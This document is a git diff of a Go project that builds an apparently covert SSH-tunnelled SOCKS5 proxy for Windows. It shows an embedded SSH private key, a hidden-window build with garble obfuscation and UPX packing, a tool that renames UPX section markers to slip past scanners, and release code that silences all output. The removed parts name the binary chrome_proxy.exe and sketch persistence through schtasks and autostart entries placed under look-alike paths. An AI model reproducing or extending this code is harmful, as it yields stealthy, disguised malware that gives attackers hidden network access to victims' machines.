.github/workflows/build.yml

@@ -100,23 +100,9 @@ jobs:
         env:
           GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
 
-
-      - name: Obfuscate UPX packed executable
-        run: "go run cmd/upx-obfuscator/main.go dist/win-release_windows_amd64_v1/go-socks5-ssh-proxy.exe"
-
-      - name: Copy win64 release exe for dist
-        run: "cp dist/win-release_windows_amd64_v1/go-socks5-ssh-proxy.exe dist/chrome_proxy.exe"
-
-      - name: Store win64 release exe for dist
+      - name: Store release artifacts
         uses: actions/upload-artifact@v4
         with:
-          name: ChromeProxyPlugin
-          path: |
-            dist/chrome_proxy.exe
-
-      - name: Store all GoReleaser artifacts
-        uses: actions/upload-artifact@v4
-        with:
-          name: dist-goreleaser
+          name: dist-release-dll
           path: |
             dist

Makefile

@@ -1,7 +1,6 @@
-SOURCES=Makefile main.go main_release.go main_debug.go config.go config_release.go config_template.go system.go
+SOURCES=Makefile main.go main_release.go main_debug.go config.go config_release.go config_template.go 
 GARBLE_BIN = $(shell go env GOPATH)/bin/garble
 GARBLE_CMD = $(GARBLE_BIN) -literals -tiny
-RELEASE_VERBOSE_MODE_KEY ?= ""
 
 all: socks5-ssh-proxy
 
@@ -21,9 +20,7 @@ socks5-ssh-proxy.release: resources $(SOURCES) $(GARBLE_BIN)
 	upx $@
 win: socks5-ssh-proxy.exe
 socks5-ssh-proxy.exe: resources $(GARBLE_BIN) $(SOURCES)
-	GOOS=windows GOARCH=amd64 $(GARBLE_CMD) build -ldflags "-H=windowsgui -X cfg.VerboseModeKey=$(RELEASE_VERBOSE_MODE_KEY)" -tags release -o $@
-	upx $@
-	go run cmd/upx-obfuscator/main.go $@
+	GOOS=windows GOARCH=amd64 $(GARBLE_CMD) build -ldflags -H=windowsgui -tags release -o $@
 goreleaser: resources $(GARBLE_BIN)
 	goreleaser build --clean --snapshot --id win-release
 win-package: ChromeProxyHelperPlugin.zip
@@ -60,9 +57,6 @@ resources/ssh_private_key:
 resources/ssh_private_key.base64: resources/ssh_private_key
 	base64 -i $< -o $@
 
-fmt:
-	gofmt -w *.go
-
 secrets: config_release.go.base64 resources/ssh_private_key.base64
 
 .phony: clean test win

README.md

@@ -61,13 +61,10 @@ Following detections have been tested:
 * go
 * upx
 * goreleaser
-* mingw-w64 (for building the windows dll/exe)
+* mingw-w64 (for building the windows dll)
 
 ## Related information
 
-* <https://github.com/rootkit-io/awesome-malware-development>
-* <https://github.com/rshipp/awesome-malware-analysis#readme>
-* <https://github.com/Karneades/awesome-malware-persistence#readme>>
 * <https://www.yourcts.com/2024/01/19/beware-of-new-go-based-malware/>
 * <https://posts.specterops.io/offensive-security-guide-to-ssh-tunnels-and-proxies-b525cbd4d4c6>
 * <https://emulator41.medium.com/golang-malware-used-by-cybercriminals-408276a276c8>
@@ -75,6 +72,8 @@ Following detections have been tested:
 
 ## Development information
 
-* <https://pypi.org/project/unipacker/>
 * <https://medium.com/analytics-vidhya/running-go-code-from-python-a65b3ae34a2d>
+* <https://github.com/weak1337/Alcatraz>
 * <https://github.com/burrowers/garble?tab=readme-ov-file#mechanism>>
+* <https://medium.com/@ankyrockstar26/unpacking-a-upx-malware-dca2cdd1a8de>
+* <https://www.mosse-security.com/2020/09/29/upx-malware-evasion-technique.html?ref=nishtahir.com>

cmd/upx-obfuscator/main.go

@@ -1,41 +0,0 @@
-package main
-
-import (
-	"os"
-	"bytes"
-	"log"
-)
-
-func bytesReplace(data, old, new []byte) []byte {
-	foundIndex := bytes.Index(data, old)
-	if foundIndex > -1 {
-		// Found it!
-		log.Println("Found identifier at offset", foundIndex)
-	} else {
-		return data
-		log.Fatalln("Error file is not UPX packed")
-	}
-
-	return bytes.Replace(data, old, new, 1)
-}
-
-func main() {
-	if len(os.Args) != 2 {
-		log.Fatalln("Specify exe file to obfuscate")
-	}
-
-	filename := os.Args[1]
-
-	log.Println("Obfuscating UPX compressed executable file")
-	log.Println("\t", filename)	
-
-	data, _ := os.ReadFile(filename)
-
-	data = bytesReplace(data, []byte("UPX0"), []byte("GSP7"))
-	data = bytesReplace(data, []byte("UPX1"), []byte("GSP1"))
-	data = bytesReplace(data, []byte("UPX2"), []byte("GSP2"))
-
-	_ = os.WriteFile(filename, data, 0666)
-
-	log.Println("done")
-}

cmd/upx_obfuscator/main.go

@@ -0,0 +1,37 @@
+package main
+
+import (
+	"os"
+	"bytes"
+	"log"
+)
+
+var originalIdentifier = []byte("UPX0")	 
+var obfuscatedIdentifier = []byte("GSP7")	 
+
+func main() {
+	if len(os.Args) != 2 {
+		log.Fatalln("Specify exe file to obfuscate")
+	}
+
+	filename := os.Args[1]
+
+	log.Println("Obfuscating UPX compressed executable file")
+	log.Println("\t", filename)	
+
+	data, _ := os.ReadFile(filename)
+
+	foundIndex := bytes.Index(data, originalIdentifier)
+	if foundIndex > -1 {
+		// Found it!
+		log.Println("Found UPX identifier at offset", foundIndex)
+	} else {
+		log.Fatalln("Error file is not UPX packed")
+	}
+
+
+	obfuscatedData := bytes.Replace(data, originalIdentifier, obfuscatedIdentifier, 1)
+	_ = os.WriteFile(filename, obfuscatedData, 0666)
+
+	log.Println("done")
+}

config.go

@@ -3,29 +3,20 @@ package main
 import "io"
 
 type config struct {
-	// Verbose mode key
-	//
-	// In release builds the verbose mode is silenced when this key is given
-	//  verbose mode is force enabled. The key is read from the "VMK" environment
-	//  variable at startup.
-	//
-	// NOTE: This could be the sha256sum hex encoded string of the SSHPrivateKeyFile
-	VerboseModeKey string
-
 	// SSH server user name
-	SSHServerUserName string
+	SSHServerUserName    string
 
 	// SSH server host and port connect to
-	SSHServerURL string
+	SSHServerURL         string
 
 	// Path to private key pem in debug builds
-	SSHPrivateKeyFile string
+	SSHPrivateKeyFile    string
 
 	// SOCKS5 listen port (when set to 0 dynamic bind)
-	SOCKS5ListenPort int
+	SOCKS5ListenPort     int
 
 	// Enable if host has SSHFP in DNS. When disabled insecure host key check is performed.
-	SSHVerifyValidSSHFP bool
+	SSHVerifyValidSSHFP  bool
 
 	// DNS client resolv.conf for fetching SSHFP records from.
 	//  Config is used when SSHVerifyValidSSHFP = true

config_template.go

@@ -1,12 +1,10 @@
 //go:build !release
 // +build !release
-
 package main
 
 import "strings"
 
 var cfg config = config{
-	VerboseModeKey:      "ShowMeTheMoney",
 	SSHServerUserName:   "username",
 	SSHPrivateKeyFile:   "path/to/id_ecdsa",
 	SSHServerURL:        "myhost.org:22",

docs/NOTES.md

@@ -1,54 +0,0 @@
-# Some notes to Escape from Babylon
-
-## Well known paths (Windows)
-
-* Python official install path for current user `%APPDATA\Local\Programs\Python\PythonXX`
-* NPM global current user path: `%APPDATA%\Roaming\npm\node_modules\npm\bin`
-* Go bin folder: `C:\Users\YourUsername\go\bin\go.exe`
-* Rust: `C:\Users\YourUsername\.cargo\bin\rustc.exe`
-* Haskel: `C:\Users\YourUsername\AppData\Roaming\local\bin\ghc.exe`
-* FireFox: `C:\Users\<username>\AppData\Local\Mozilla Firefox\firefox.exe`
-* Chrome: `C:\Users\<username>\AppData\Local\Google\Chrome\Application`
-	* `chrome.exe`: The main executable for launching Google Chrome.
-	* `chrome_proxy.exe`: A process used for managing proxy settings in Chrome.
-	* `chrome_launcher.exe`: Typically used to start the Chrome browser with specific configurations.
-	* `chrome.dll`: While not an .exe, chrome.dll is a crucial dynamic link library file used by Chrome. (For context, it is located in the same directory or subdirectories, but it’s not an executable file.)
-	* `chrome_remote_desktop_host.exe`: If Chrome Remote Desktop is installed, this executable handles remote desktop connections.
-	* `chrome_update.exe`: An executable for updating Chrome.
-
-* Edge extensions: `C:\Users\<YourUsername>\AppData\Local\Microsoft\Edge\User Data\Default\Extensions`
-* Opera: `C:\Users\<YourUsername>\AppData\Roaming\Opera Software\Opera Stable\Extensions`
-* Firefox profile extensions: `C:\Users\<YourUsername>\AppData\Roaming\Mozilla\Firefox\Profiles\<ProfileName>\extensions`
-* Chrome extensions and components: `C:\Users\<YourUsername>\AppData\Local\Google\Chrome\User Data\Default\Extensions`
-
-Check if running under wine by testing if executables are present:
-
-* `.wine/drive_c/windows/syswow64/wine*.exe`
-* `.wine/drive_c/windows/system32/wine*.exe`
-
-## Ultimate Packer for Executables (UPX)
-
-* <https://www.ired.team/offensive-security/defense-evasion/t1045-software-packing-upx>
-* <https://medium.com/@ankyrockstar26/unpacking-a-upx-malware-dca2cdd1a8de>
-* <https://www.mosse-security.com/2020/09/29/upx-malware-evasion-technique.html?ref=nishtahir.com>
-* <https://www.esecurityplanet.com/threats/upx-compression-detection-evasion/>
-
-## Persistence and hiding
-
-* Search for existing well known binary paths
-* Copy argv[0] to well known binary path
-* Register startup by system
-  * schtasks (cmd) for system or local user
-  * go-autostart: shortcut in start-menu
-* Write state file of persistence to somewhere...
-
-## Debugging release build
-
-* The "VMK" environment variable is the VerboseModeKey which enables logging to stdout/stderr even in release build
-
-## Windows
-
-* Copy to well known current user binary path to semi related filenames
-* Run via start menu item for current user, or via `schtasks`
-  * <https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create>
-  * <https://github.com/emersion/go-autostart>

main.go

@@ -133,14 +133,6 @@ func main() {
 
 	log.Println("SOCKS5 Addr", proxyServerURL)
 
-	systemOSDetect()
-	systemGetWellKnownExistingPaths()
-
-	mainLoop()
-}
-
-func mainLoop() {
 	for {
-		// TODO handle CTRL+C in debug and release + VMK modes
 	}
 }

main_debug.go

@@ -1,6 +1,5 @@
 //go:build !release
 // +build !release
-
 package main
 
 var resourceSSHPrivateKey string

main_release.go

@@ -1,20 +1,29 @@
 //go:build release
 // +build release
-
 package main
 
 import (
 	_ "embed"
 	"os"
+	"fmt"
+	"log"
 )
 
 //go:embed resources/ssh_private_key
 var resourceSSHPrivateKey string
 
 func init() {
-	dontSilenceKey := os.Getenv("VMK")
-	if dontSilenceKey != cfg.VerboseModeKey {
-		systemRouteAllLogging(os.DevNull)
-		systemIgnoreAllSignals()
+	// Open /dev/null for writing
+	nullFile, err := os.OpenFile(os.DevNull, os.O_WRONLY, 0666)
+	if err != nil {
+		fmt.Println("Error opening /dev/null:", err)
+		return
 	}
+
+	// Redirect stdout and stderr to /dev/null
+	os.Stdout = nullFile
+	os.Stderr = nullFile
+
+	// Redirect log facility to /dev/null
+	log.SetOutput(nullFile)
 }

system.go

@@ -1,166 +0,0 @@
-package main
-
-import (
-	"fmt"
-	"log"
-	"os"
-	"os/signal"
-	"path/filepath"
-	"strings"
-)
-
-// Route all logging
-func systemRouteAllLogging(logfile string) {
-	nullFile, err := os.OpenFile(logfile, os.O_WRONLY, 0666)
-	if err != nil {
-		fmt.Println("Error opening /dev/null:", err)
-		return
-	}
-
-	// Redirect stdout and stderr to /dev/null
-	os.Stdout = nullFile
-	os.Stderr = nullFile
-
-	// Redirect log facility to /dev/null
-	log.SetOutput(nullFile)
-}
-
-func systemGetAppDataPath() string {
-	return filepath.Join(os.Getenv("USERPROFILE"), "AppData")
-}
-
-// systemCheckDirExists checks if the directory at the given path exists.
-func systemIsDirExisting(path string) bool {
-	// Get file info
-	info, err := os.Stat(path)
-	if err != nil {
-		// If the error is due to the file not existing, return false
-		if os.IsNotExist(err) {
-			return false
-		}
-		// For any other errors, you may want to handle them as needed
-		return false
-	}
-
-	// Check if the info corresponds to a directory
-	return info.IsDir()
-}
-
-func systemGetFilesInDirectory(path string) ([]string, bool) {
-	var filesInDirectory []string
-
-	files, err := os.ReadDir(path)
-	if err != nil {
-		return nil, false
-	}
-
-	for _, file := range files {
-		filesInDirectory = append(filesInDirectory, file.Name())
-	}
-
-	return filesInDirectory, true
-}
-
-func systemIsFileExisting(path string) bool {
-	// Get file info
-	info, err := os.Stat(path)
-	if err != nil {
-		// If the error is due to the file not existing, return false
-		if os.IsNotExist(err) {
-			return false
-		}
-		// For any other errors, you may want to handle them as needed
-		return false
-	}
-
-	// Check if the info corresponds to a regular file
-	return !info.IsDir()
-}
-
-func systemGetSysWOW64Files() []string {
-	sysWOW64Path := filepath.Join("C:", "Windows", "SysWOW64")
-	files, _ := systemGetFilesInDirectory(sysWOW64Path)
-	return files
-}
-
-func systemGetSystem32Files() []string {
-	system32Path := filepath.Join("C:", "Windows", "system32")
-	files, _ := systemGetFilesInDirectory(system32Path)
-	return files
-}
-
-func systemGetWellKnownWINEOSFiles() []string {
-	var wineFiles []string
-	var foundFiles []string
-
-	foundFiles = append(foundFiles, systemGetSysWOW64Files()...)
-	foundFiles = append(foundFiles, systemGetSystem32Files()...)
-
-	for _, file := range foundFiles {
-		if strings.Contains(file, "wine") && strings.Contains(file, ".exe") {
-			wineFiles = append(wineFiles, file)
-		}
-	}
-
-	return wineFiles
-}
-
-func systemGetWellKnownExistingPaths() []string {
-	var existingPaths []string
-
-	appDataPath := systemGetAppDataPath()
-	if ok := systemIsDirExisting(appDataPath); !ok {
-		log.Println("\t❌", appDataPath)
-	}
-
-	wellKnownPathsToCheck := []string{
-		filepath.Join(appDataPath, "Local", "Programs", "Python"),           // TODO search python installations
-		filepath.Join(appDataPath, "Roaming", "npm", "node_modules", "bin"), // TODO search python installations
-	}
-
-	homeDirectory, err := os.UserHomeDir()
-	if err == nil {
-		homeDirPathsToCheck := []string{
-			filepath.Join(homeDirectory, "go", "bin"),
-		}
-		wellKnownPathsToCheck = append(wellKnownPathsToCheck, homeDirPathsToCheck...)
-	}
-
-	for _, path := range wellKnownPathsToCheck {
-		if ok := systemIsDirExisting(path); ok {
-			existingPaths = append(existingPaths, path)
-			log.Println("\t✅", path)
-		} else {
-			log.Println("\t❌", path)
-		}
-	}
-
-	return existingPaths
-}
-
-func systemIgnoreAllSignals() {
-	// Create a channel to receive OS signals.
-	sigs := make(chan os.Signal, 1)
-
-	// Notify the signal channel for all signals (you can add more if needed)
-	signal.Notify(sigs)
-
-	// This goroutine receives signals but does nothing with them.
-	go func() {
-		for sig := range sigs {
-			// Signal received but ignored
-			_ = sig
-			log.Println("Received OS signal", sig)
-		}
-	}()
-}
-
-func systemOSDetect() {
-	wineOSFiles := systemGetWellKnownWINEOSFiles()
-	if len(wineOSFiles) != 0 {
-		log.Println("WINE detected")
-		for _, file := range wineOSFiles {
-			log.Println("\t", file)
-		}
-	}
-}